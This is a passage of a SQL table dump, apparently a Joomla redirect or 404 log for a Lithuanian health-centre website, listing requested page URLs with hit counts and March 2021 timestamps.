00:00:00'),(4473,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=50:darbo-uzmokestis-3&option=com_content&view=article','','','',1,0,'2021-02-25 16:15:45','0000-00-00 00:00:00'),(4474,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=46:2016-m-finansines-ataskaitos&option=com_content&view=article','','','',2,0,'2021-02-25 22:56:02','0000-00-00 00:00:00'),(4475,'https://www.infotytuvenai.lt/index.php/lt/installation?id=56&option=com_content&view=article','','','',1,0,'2021-02-26 07:08:23','0000-00-00 00:00:00'),(4476,'https://infotytuvenai.lt/index.php/lt/?catid=11:about&id=18:typography&option=com_content&view=article','','','',1,0,'2021-02-26 07:24:22','0000-00-00 00:00:00'),(4477,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=124&id=23:sveikinimas&option=com_k2&view=item','','','',1,0,'2021-02-26 19:10:12','0000-00-00 00:00:00'),(4478,'https://infotytuvenai.lt/index.php/lt/?catid=11:about&id=13:infinite-color-schemes&option=com_content&view=article','','','',1,0,'2021-02-27 00:11:22','0000-00-00 00:00:00'),(4479,'https://www.infotytuvenai.lt/index.php/lt/installation?Itemid=208&id=58&option=com_content&view=article','','','',1,0,'2021-02-27 00:25:26','0000-00-00 00:00:00'),(4480,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=63:2018-m-finansines-ataskaitos&option=com_content&view=article','','','',2,0,'2021-02-27 02:00:18','0000-00-00 00:00:00'),(4481,'https://infotytuvenai.lt/index.php/lt/?catid=9:extensions&id=26:hot-joomla-carousel&option=com_content&view=article','','','',2,0,'2021-02-28 16:50:52','0000-00-00 00:00:00'),(4482,'https://www.infotytuvenai.lt/index.php/lt/details-menu','','','',1,0,'2021-02-28 23:29:23','0000-00-00 00:00:00'),(4483,'https://infotytuvenai.lt/index.php/lt/?Itemid=203&id=53&option=com_content&view=article','','','',1,0,'2021-03-01 02:13:50','0000-00-00 00:00:00'),(4484,'https://www.infotytuvenai.lt/index.php/lt/installation?Itemid=209&id=59&option=com_content&view=article','','','',1,0,'2021-03-01 09:15:22','0000-00-00 00:00:00'),(4485,'https://infotytuvenai.lt/index.php/lt/?Itemid=213&catid=13:veikla&id=62:medicinos-normos&option=com_content&view=article','','','',2,0,'2021-03-01 12:57:56','0000-00-00 00:00:00'),(4486,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=31','','','',49,0,'2021-03-01 14:23:25','0000-00-00 00:00:00'),(4487,'https://www.infotytuvenai.lt/index.php/lt//2020/wp-includes/wlwmanifest.xml','','','',103,0,'2021-03-01 16:40:48','0000-00-00 00:00:00'),(4488,'https://www.infotytuvenai.lt/index.php/lt/?catid=11:about&id=15:module-positions&option=com_content&view=article','','','',2,0,'2021-03-01 21:50:25','0000-00-00 00:00:00'),(4489,'https://www.infotytuvenai.lt/index.php/lt/?catid=11:about&id=16:no-conflicts&option=com_content&view=article','','','',1,0,'2021-03-02 01:25:06','0000-00-00 00:00:00'),(4490,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=124&id=22:svarbi-informacija&option=com_k2&view=item','','','',1,0,'2021-03-02 07:13:47','0000-00-00 00:00:00'),(4491,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=56','','','',55,0,'2021-03-02 08:43:42','0000-00-00 00:00:00'),(4492,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=50:darbo-uzmokestis-3&catid=13&Itemid=197','','','',24,0,'2021-03-02 09:57:32','0000-00-00 00:00:00'),(4493,'https://infotytuvenai.lt/index.php/lt/?catid=11&id=15:module-positions&option=com_content&view=article','','','',1,0,'2021-03-02 20:12:45','0000-00-00 00:00:00'),(4494,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13&id=54:darbo-uzmokestis-2017-m&option=com_content&view=article','','','',1,0,'2021-03-03 05:54:24','0000-00-00 00:00:00'),(4495,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=63:2018-m-finansines-ataskaitos&option=com_content&view=article','','','',2,0,'2021-03-03 05:55:43','0000-00-00 00:00:00'),(4496,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/gedulingi-pietus','','','',120,0,'2021-03-03 16:39:15','0000-00-00 00:00:00'),(4497,'https://infotytuvenai.lt/index.php/lt/?catid=10:joomla-blog&id=8:sample-blog-post-1&option=com_content&view=article','','','',1,0,'2021-03-04 11:09:47','0000-00-00 00:00:00'),(4498,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=46&Itemid=203','','','',32,0,'2021-03-04 16:31:42','0000-00-00 00:00:00'),(4499,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=48:viesieji-pirkimai-3&option=com_content&view=article','','','',1,0,'2021-03-05 04:07:40','0000-00-00 00:00:00'),(4500,'https://infotytuvenai.lt/index.php/lt/?catid=2&id=56:nuorodos&option=com_content&view=article','','','',2,0,'2021-03-05 12:21:18','0000-00-00 00:00:00'),(4501,'https://infotytuvenai.lt/index.php/lt/?catid=11:about&id=15:module-positions&option=com_content&view=article','','','',1,0,'2021-03-06 00:56:58','0000-00-00 00:00:00'),(4502,'https://infotytuvenai.lt/index.php/lt/?Itemid=197&catid=13:veikla&id=50:darbo-uzmokestis-3&option=com_content&view=article','','','',2,0,'2021-03-07 14:28:03','0000-00-00 00:00:00'),(4503,'https://infotytuvenai.lt/index.php/lt/?catid=12:instructions&id=21:standard-installation-template-without-demo&option=com_content&view=article','','','',1,0,'2021-03-08 14:09:00','0000-00-00 00:00:00'),(4504,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=48&Itemid=202','','','',35,0,'2021-03-09 02:42:02','0000-00-00 00:00:00'),(4505,'https://infotytuvenai.lt/index.php/lt/component/content/category/43-apie-centra/general','','','',7,0,'2021-03-09 03:02:21','0000-00-00 00:00:00'),(4506,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=37:darbo-uzmokestis&catid=13:veikla&Itemid=201','','','',34,0,'2021-03-09 09:06:01','0000-00-00 00:00:00'),(4507,'https://infotytuvenai.lt/index.php/lt/?Itemid=202&catid=13&id=38:viesieji-pirkimai&option=com_content&view=article','','','',2,0,'2021-03-11 05:52:42','0000-00-00 00:00:00'),(4508,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=47:viesieji-pirkimai-2&catid=13&Itemid=197','','','',23,0,'2021-03-15 20:12:36','0000-00-00 00:00:00'),(4509,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=51:darbo-uzmokestis-4&catid=13:veikla&Itemid=197','','','',38,0,'2021-03-16 12:17:56','0000-00-00 00:00:00'),(4510,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=37:darbo-uzmokestis&catid=13&Itemid=201','','','',26,0,'2021-03-16 12:23:06','0000-00-00 00:00:00'),(4511,'https://www.infotytuvenai.lt/index.php/lt/apie-centra; info@infotytuvenai.lt','','','',19,0,'2021-03-16 13:34:35','0000-00-00 00:00:00'),(4512,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=61:asmens-duomenu-apsauga&catid=2:uncategorised&Itemid=212','','','',43,0,'2021-03-16 13:39:20','0000-00-00 00:00:00'),(4513,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=38:viesieji-pirkimai&catid=13&Itemid=202','','','',28,0,'2021-03-16 14:27:13','0000-00-00 00:00:00'),(4514,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=29','','','',27,0,'2021-03-16 16:59:00','0000-00-00 00:00:00'),(4515,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=55&Itemid=207','','','',22,0,'2021-03-16 17:21:57','0000-00-00 00:00:00'),(4516,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=54:darbo-uzmokestis-2017-m&catid=13:veikla&Itemid=197','','','',31,0,'2021-03-16 17:32:16','0000-00-00 00:00:00'),(4517,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=39:finansines-ataskaitos&catid=13&Itemid=197','','','',26,0,'2021-03-16 17:42:25','0000-00-00 00:00:00'),(4518,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=68&Itemid=217','','','',43,0,'2021-03-16 17:52:41','0000-00-00 00:00:00'),(4519,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=50:darbo-uzmokestis-3&catid=13&Itemid=197','','','',32,0,'2021-03-16 18:49:23','0000-00-00 00:00:00'),(4520,'https://infotytuvenai.lt/index.php/lt/?option=com_k2&view=item&id=17:skiepijimas-nuo-pneumokokines-infekcijos&Itemid=124','','','',19,0,'2021-03-16 18:59:49','0000-00-00 00:00:00'),(4521,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=63:2018-m-finansines-ataskaitos&catid=13&Itemid=197','','','',35,0,'2021-03-16 20:33:19','0000-00-00 00:00:00'),(4522,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=30&Itemid=204','','','',25,0,'2021-03-16 20:52:42','0000-00-00 00:00:00'),(4523,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=45:2015-m-finansines-ataskaitos&catid=13:veikla&Itemid=197','','','',30,0,'2021-03-16 21:17:23','0000-00-00 00:00:00'),(4524,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=36:vidaus-darbo-tvarkos-taisykles&catid=13:veikla&Itemid=200','','','',43,0,'2021-03-16 22:32:09','0000-00-00 00:00:00'),(4525,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=49&Itemid=201','','','',15,0,'2021-03-17 00:22:29','0000-00-00 00:00:00'),(4526,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=47:viesieji-pirkimai-2&catid=13&Itemid=197','','','',22,0,'2021-03-17 01:03:12','0000-00-00 00:00:00'),(4527,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=67&Itemid=201','','','',23,0,'2021-03-17 01:51:04','0000-00-00 00:00:00'),(4528,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=34:istatai&catid=13&Itemid=198','','','',20,0,'2021-03-17 04:18:11','0000-00-00 00:00:00'),(4529,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=31:veiklos-licencija&catid=2:uncategorised','','','',25,0,'2021-03-17 04:22:48','0000-00-00 00:00:00'),(4530,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=35:pareigybiu-sarasas&catid=13&Itemid=199','','','',34,0,'2021-03-17 04:32:26','0000-00-00 00:00:00'),(4531,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=49:darbo-uzmokestis-2&catid=13&Itemid=197','','','',30,0,'2021-03-17 04:55:12','0000-00-00 00:00:00'),(4532,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=38:viesieji-pirkimai&catid=13:veikla&Itemid=202','','','',18,0,'2021-03-17 05:22:38','0000-00-00 00:00:00'),(4533,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=54:darbo-uzmokestis-2017-m&catid=13&Itemid=197','','','',30,0,'2021-03-17 07:02:52','0000-00-00 00:00:00'),(4534,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=66:finatas-2&catid=13&Itemid=197','','','',30,0,'2021-03-17 07:24:21','0000-00-00 00:00:00'),(4535,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=45&Itemid=203','','','',18,0,'2021-03-17 07:29:32','0000-00-00 00:00:00'),(4536,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=41:korupcijos-prevencija&catid=13&Itemid=211','','','',31,0,'2021-03-17 08:20:29','0000-00-00 00:00:00'),(4537,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=36:vidaus-darbo-tvarkos-taisykles&catid=13&Itemid=200','','','',31,0,'2021-03-17 08:36:58','0000-00-00 00:00:00'),(4538,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=item&id=11:del-covid-19-prevencijos&Itemid=124','','','',36,0,'2021-03-17 12:26:46','0000-00-00 00:00:00'),(4539,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=42&Itemid=203','','','',29,0,'2021-03-17 12:51:01','0000-00-00 00:00:00'),(4540,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=34:istatai&catid=13:veikla&Itemid=198','','','',35,0,'2021-03-17 13:03:19','0000-00-00 00:00:00'),(4541,'https://infotytuvenai.lt/index.php/lt/?option=com_k2&view=item&id=18:meningokokines-infekcijos&Itemid=124','','','',27,0,'2021-03-17 14:06:09','0000-00-00 00:00:00'),(4542,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197','','','',23,0,'2021-03-17 14:12:28','0000-00-00 00:00:00'),(4543,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=51:darbo-uzmokestis-4&catid=13&Itemid=197','','','',26,0,'2021-03-17 14:29:39','0000-00-00 00:00:00'),(4544,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=67:darbo-uzmokestis-5&catid=13&Itemid=197','','','',25,0,'2021-03-17 14:35:50','0000-00-00 00:00:00'),(4545,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=30','','','',31,0,'2021-03-17 15:23:38','0000-00-00 00:00:00'),(4546,'https://infotytuvenai.lt/index.php/lt/?option=com_k2&view=item&id=11:del-covid-19-prevencijos&Itemid=124','','','',24,0,'2021-03-17 15:29:31','0000-00-00 00:00:00'),(4547,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=60:darbo-uzmokestis-2018-m&catid=2:uncategorised&Itemid=201','','','',26,0,'2021-03-17 16:54:17','0000-00-00 00:00:00'),(4548,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=68:strategija&catid=13:veikla&Itemid=217','','','',18,0,'2021-03-17 17:00:00','0000-00-00 00:00:00'),(4549,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=50:darbo-uzmokestis-3&catid=13:veikla&Itemid=197','','','',25,0,'2021-03-17 17:06:16','0000-00-00 00:00:00'),(4550,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=54&Itemid=201','','','',21,0,'2021-03-17 17:56:39','0000-00-00 00:00:00'),(4551,'https://infotytuvenai.lt/index.php/lt/?option=com_k2&view=item&id=16:covid-19-identifikavimas&Itemid=124','','','',29,0,'2021-03-17 18:13:43','0000-00-00 00:00:00'),(4552,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=41:korupcijos-prevencija&catid=13:veikla&Itemid=211','','','',26,0,'2021-03-17 18:24:53','0000-00-00 00:00:00'),(4553,'https://infotytuvenai.lt/index.php/lt/?option=com_k2&view=itemlist&layout=category&task=category&id=8&Itemid=124','','','',21,0,'2021-03-17 18:42:07','0000-00-00 00:00:00'),(4554,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62:medicinos-normos&catid=13:veikla&Itemid=213','','','',27,0,'2021-03-17 18:59:35','0000-00-00 00:00:00'),(4555,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=46:2016-m-finansines-ataskaitos&catid=13:veikla&Itemid=197','','','',28,0,'2021-03-17 22:40:57','0000-00-00 00:00:00'),(4556,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=51:darbo-uzmokestis-4&catid=13:veikla&Itemid=197','','','',26,0,'2021-03-17 22:52:41','0000-00-00 00:00:00'),(4557,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=42:finatas&catid=13&Itemid=203','','','',28,0,'2021-03-17 23:57:43','0000-00-00 00:00:00'),(4558,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=46:2016-m-finansines-ataskaitos&catid=13:veikla&Itemid=197','','','',24,0,'2021-03-18 00:09:17','0000-00-00 00:00:00'),(4559,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=36:vidaus-darbo-tvarkos-taisykles&catid=13&Itemid=200','','','',35,0,'2021-03-18 00:20:32','0000-00-00 00:00:00'),(4560,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=42:finatas&catid=13:veikla&Itemid=203','','','',32,0,'2021-03-18 00:25:53','0000-00-00 00:00:00'),(4561,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=43:2014-m-finansines-ataskaitos&catid=2:uncategorised&Itemid=203','','','',21,0,'2021-03-18 01:07:09','0000-00-00 00:00:00'),(4562,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=35:pareigybiu-sarasas&catid=13&Itemid=199','','','',36,0,'2021-03-18 01:29:32','0000-00-00 00:00:00'),(4563,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62:medicinos-normos&catid=13&Itemid=213','','','',31,0,'2021-03-18 03:02:12','0000-00-00 00:00:00'),(4564,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=37:darbo-uzmokestis&catid=13:veikla&Itemid=201','','','',24,0,'2021-03-18 03:53:07','0000-00-00 00:00:00'),(4565,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=48:viesieji-pirkimai-3&catid=13&Itemid=197','','','',31,0,'2021-03-18 04:27:18','0000-00-00 00:00:00'),(4566,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=50&Itemid=201','','','',19,0,'2021-03-18 06:06:32','0000-00-00 00:00:00'),(4567,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=48&Itemid=202','','','',28,0,'2021-03-18 06:49:05','0000-00-00 00:00:00'),(4568,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=35&Itemid=199','','','',55,0,'2021-03-18 07:10:13','0000-00-00 00:00:00'),(4569,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=34:istatai&catid=13:veikla&Itemid=198','','','',31,0,'2021-03-18 07:53:24','0000-00-00 00:00:00'),(4570,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=40&Itemid=210','','','',47,0,'2021-03-18 10:45:21','0000-00-00 00:00:00'),(4571,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=63&Itemid=203','','','',22,0,'2021-03-18 11:36:04','0000-00-00 00:00:00'),(4572,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=34:istatai&catid=13&Itemid=198','','','',24,0,'2021-03-18 11:45:47','0000-00-00 00:00:00'),(4573,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=57:su-narkotikais-susijusios-zalos-mazinimas&catid=2:uncategorised','','','',42,0,'2021-03-18 13:20:46','0000-00-00 00:00:00'),(4574,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=49:darbo-uzmokestis-2&catid=13&Itemid=197','','','',31,0,'2021-03-18 14:29:04','0000-00-00 00:00:00'),(4575,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=55:privatumo-politika&catid=2:uncategorised&Itemid=207','','','',24,0,'2021-03-18 16:40:49','0000-00-00 00:00:00'),(4576,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=35:pareigybiu-sarasas&catid=13:veikla&Itemid=199','','','',30,0,'2021-03-18 16:51:14','0000-00-00 00:00:00'),(4577,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=35&Itemid=199','','','',23,0,'2021-03-18 18:45:01','0000-00-00 00:00:00'),(4578,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=39&Itemid=203','','','',31,0,'2021-03-18 19:05:20','0000-00-00 00:00:00'),(4579,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=42:finatas&catid=13&Itemid=203','','','',23,0,'2021-03-18 19:15:38','0000-00-00 00:00:00'),(4580,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=46:2016-m-finansines-ataskaitos&catid=13&Itemid=197','','','',19,0,'2021-03-18 20:39:29','0000-00-00 00:00:00'),(4581,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=50&Itemid=201','','','',39,0,'2021-03-18 23:07:33','0000-00-00 00:00:00'),(4582,'https://infotytuvenai.lt/index.php/lt/?option=com_k2&view=item&id=19:mediku-ragininimas&Itemid=124','','','',23,0,'2021-03-19 01:29:00','0000-00-00 00:00:00'),(4583,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=38&Itemid=202','','','',17,0,'2021-03-19 04:13:14','0000-00-00 00:00:00'),(4584,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=30:teikiamos-paslaugos&catid=2:uncategorised&Itemid=204','','','',37,0,'2021-03-19 05:25:33','0000-00-00 00:00:00'),(4585,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=53:2017-m-finansines-ataskaitos&catid=13:veikla&Itemid=197','','','',23,0,'2021-03-19 05:35:49','0000-00-00 00:00:00'),(4586,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=29:mums-rupi-jusu-sveikata&catid=2:uncategorised','','','',29,0,'2021-03-19 07:26:25','0000-00-00 00:00:00'),(4587,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=53:2017-m-finansines-ataskaitos&catid=13:veikla&Itemid=197','','','',19,0,'2021-03-19 07:46:25','0000-00-00 00:00:00'),(4588,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213','','','',30,0,'2021-03-19 09:07:31','0000-00-00 00:00:00'),(4589,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=46:2016-m-finansines-ataskaitos&catid=13&Itemid=197','','','',30,0,'2021-03-19 10:59:32','0000-00-00 00:00:00'),(4590,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=58:mokamos-paslaugos&catid=2:uncategorised&Itemid=208','','','',41,0,'2021-03-19 12:37:41','0000-00-00 00:00:00'),(4591,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=51&Itemid=201','','','',25,0,'2021-03-19 12:47:49','0000-00-00 00:00:00'),(4592,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=60:darbo-uzmokestis-2018-m&catid=2:uncategorised&Itemid=201','','','',29,0,'2021-03-19 15:30:12','0000-00-00 00:00:00'),(4593,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=45:2015-m-finansines-ataskaitos&catid=13:veikla&Itemid=197','','','',37,0,'2021-03-19 16:11:12','0000-00-00 00:00:00'),(4594,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=53:2017-m-finansines-ataskaitos&catid=13&Itemid=197','','','',27,0,'2021-03-19 18:42:02','0000-00-00 00:00:00'),(4595,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=55&Itemid=207','','','',43,0,'2021-03-19 18:51:43','0000-00-00 00:00:00'),(4596,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=56','','','',39,0,'2021-03-19 19:21:06','0000-00-00 00:00:00'),(4597,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=45:2015-m-finansines-ataskaitos&catid=13&Itemid=197','','','',28,0,'2021-03-19 19:41:02','0000-00-00 00:00:00'),(4598,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=40&Itemid=205','','','',42,0,'2021-03-19 21:01:47','0000-00-00 00:00:00'),(4599,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=35:pareigybiu-sarasas&catid=13:veikla&Itemid=199','','','',25,0,'2021-03-19 23:34:22','0000-00-00 00:00:00'),(4600,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=66:finatas-2&catid=13:veikla&Itemid=197','','','',14,0,'2021-03-20 01:22:02','0000-00-00 00:00:00'),(4601,'https://infotytuvenai.lt/index.php/lt/?option=com_k2&view=item&id=20:dekojame-uz-pagalba&Itemid=124','','','',16,0,'2021-03-20 01:43:19','0000-00-00 00:00:00'),(4602,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=item&id=20:dekojame-uz-pagalba&Itemid=124','','','',36,0,'2021-03-20 02:02:39','0000-00-00 00:00:00'),(4603,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=51:darbo-uzmokestis-4&catid=13&Itemid=197','','','',34,0,'2021-03-20 03:32:24','0000-00-00 00:00:00'),(4604,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=59&Itemid=209','','','',24,0,'2021-03-20 05:21:39','0000-00-00 00:00:00'),(4605,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=54:darbo-uzmokestis-2017-m&catid=13&Itemid=197','','','',29,0,'2021-03-20 07:21:09','0000-00-00 00:00:00'),(4606,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=59:nemokamos-paslaugos&catid=2:uncategorised&Itemid=209','','','',19,0,'2021-03-20 07:31:30','0000-00-00 00:00:00'),(4607,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=38:viesieji-pirkimai&catid=13:veikla&Itemid=202','','','',32,0,'2021-03-20 08:32:59','0000-00-00 00:00:00'),(4608,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=53:2017-m-finansines-ataskaitos&catid=13&Itemid=197','','','',31,0,'2021-03-20 09:44:14','0000-00-00 00:00:00'),(4609,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=57','','','',27,0,'2021-03-20 10:44:16','0000-00-00 00:00:00'),(4610,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=40&Itemid=210','','','',19,0,'2021-03-20 11:55:54','0000-00-00 00:00:00'),(4611,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=66&Itemid=203','','','',33,0,'2021-03-20 13:36:27','0000-00-00 00:00:00'),(4612,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=38:viesieji-pirkimai&catid=13&Itemid=202','','','',32,0,'2021-03-20 13:46:13','0000-00-00 00:00:00'),(4613,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=34&Itemid=198','','','',45,0,'2021-03-20 16:36:25','0000-00-00 00:00:00'),(4614,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=29:mums-rupi-jusu-sveikata&catid=2:uncategorised','','','',16,0,'2021-03-20 18:32:23','0000-00-00 00:00:00'),(4615,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=47:viesieji-pirkimai-2&catid=13:veikla&Itemid=197','','','',35,0,'2021-03-20 20:57:42','0000-00-00 00:00:00'),(4616,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=45&Itemid=203','','','',32,0,'2021-03-21 01:19:11','0000-00-00 00:00:00'),(4617,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=66&Itemid=203','','','',21,0,'2021-03-21 04:14:48','0000-00-00 00:00:00'),(4618,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=67&Itemid=201','','','',29,0,'2021-03-21 06:32:00','0000-00-00 00:00:00'),(4619,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=67:darbo-uzmokestis-5&catid=13:veikla&Itemid=197','','','',25,0,'2021-03-21 09:36:42','0000-00-00 00:00:00'),(4620,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=46&Itemid=203','','','',19,0,'2021-03-21 11:20:37','0000-00-00 00:00:00'),(4621,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=59&Itemid=209','','','',70,0,'2021-03-21 12:47:17','0000-00-00 00:00:00'),(4622,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=42:finatas&catid=13:veikla&Itemid=203','','','',21,0,'2021-03-21 13:34:32','0000-00-00 00:00:00'),(4623,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=48:viesieji-pirkimai-3&catid=13:veikla&Itemid=197','','','',18,0,'2021-03-21 14:58:31','0000-00-00 00:00:00'),(4624,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=63:2018-m-finansines-ataskaitos&catid=13&Itemid=197','','','',33,0,'2021-03-21 18:38:43','0000-00-00 00:00:00'),(4625,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=68:strategija&catid=13&Itemid=217','','','',20,0,'2021-03-21 18:57:16','0000-00-00 00:00:00'),(4626,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=37&Itemid=201','','','',49,0,'2021-03-21 23:49:16','0000-00-00 00:00:00'),(4627,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=41:korupcijos-prevencija&catid=13:veikla&Itemid=211','','','',26,0,'2021-03-22 02:38:20','0000-00-00 00:00:00'),(4628,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=63&Itemid=203','','','',32,0,'2021-03-22 10:11:30','0000-00-00 00:00:00'),(4629,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=68&Itemid=217','','','',32,0,'2021-03-22 12:40:03','0000-00-00 00:00:00'),(4630,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=31','','','',22,0,'2021-03-22 13:00:05','0000-00-00 00:00:00'),(4631,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=53&Itemid=203','','','',45,0,'2021-03-23 03:02:11','0000-00-00 